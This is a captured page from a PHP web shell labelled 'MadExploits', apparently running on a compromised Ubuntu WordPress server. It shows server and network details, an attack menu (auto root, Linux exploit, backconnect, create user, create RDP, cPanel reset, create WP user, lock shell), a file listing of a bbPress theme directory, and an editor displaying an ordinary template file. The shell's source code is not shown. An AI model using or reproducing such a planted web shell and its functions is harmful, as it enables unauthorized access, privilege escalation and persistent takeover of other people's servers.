Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
owc /
wp-content /
themes /
eduma /
bbpress /
[ HOME SHELL ]
Name
Size
Permission
Action
content-archive-forum.php
642
B
-rwxr-x--x
content-archive-topic.php
798
B
-rwxr-x--x
content-search.php
733
B
-rwxr-x--x
content-single-forum.php
1.08
KB
-rwxr-x--x
content-single-reply.php
446
B
-rwxr-x--x
content-single-topic-lead.php
2.36
KB
-rwxr-x--x
content-single-topic.php
979
B
-rwxr-x--x
content-single-user.php
939
B
-rwxr-x--x
content-single-view.php
550
B
-rwxr-x--x
content-statistics.php
1.8
KB
-rwxr-x--x
content-topic-tag-edit.php
349
B
-rwxr-x--x
form-reply.php
6.2
KB
-rwxr-x--x
form-search.php
721
B
-rwxr-x--x
form-topic.php
7.76
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : content-statistics.php
<?php /** * Statistics Content Part * * @package bbPress * @subpackage Theme */ // Get the statistics $stats = bbp_get_statistics(); ?> <dl role="main"> <?php do_action( 'bbp_before_statistics' ); ?> <dt><?php esc_html_e( 'Registered Users', 'eduma' ); ?></dt> <dd> <strong><?php echo esc_html( $stats['user_count'] ); ?></strong> </dd> <dt><?php esc_html_e( 'Forums', 'eduma' ); ?></dt> <dd> <strong><?php echo esc_html( $stats['forum_count'] ); ?></strong> </dd> <dt><?php esc_html_e( 'Topics', 'eduma' ); ?></dt> <dd> <strong><?php echo esc_html( $stats['topic_count'] ); ?></strong> </dd> <dt><?php esc_html_e( 'Replies', 'eduma' ); ?></dt> <dd> <strong><?php echo esc_html( $stats['reply_count'] ); ?></strong> </dd> <dt><?php esc_html_e( 'Topic Tags', 'eduma' ); ?></dt> <dd> <strong><?php echo esc_html( $stats['topic_tag_count'] ); ?></strong> </dd> <?php if ( !empty( $stats['empty_topic_tag_count'] ) ) : ?> <dt><?php esc_html_e( 'Empty Topic Tags', 'eduma' ); ?></dt> <dd> <strong><?php echo esc_html( $stats['empty_topic_tag_count'] ); ?></strong> </dd> <?php endif; ?> <?php if ( !empty( $stats['topic_count_hidden'] ) ) : ?> <dt><?php esc_html_e( 'Hidden Topics', 'eduma' ); ?></dt> <dd> <strong> <abbr title="<?php echo esc_attr( $stats['hidden_topic_title'] ); ?>"><?php echo esc_html( $stats['topic_count_hidden'] ); ?></abbr> </strong> </dd> <?php endif; ?> <?php if ( !empty( $stats['reply_count_hidden'] ) ) : ?> <dt><?php esc_html_e( 'Hidden Replies', 'eduma' ); ?></dt> <dd> <strong> <abbr title="<?php echo esc_attr( $stats['hidden_reply_title'] ); ?>"><?php echo esc_html( $stats['reply_count_hidden'] ); ?></abbr> </strong> </dd> <?php endif; ?> <?php do_action( 'bbp_after_statistics' ); ?> </dl> <?php unset( $stats );
Close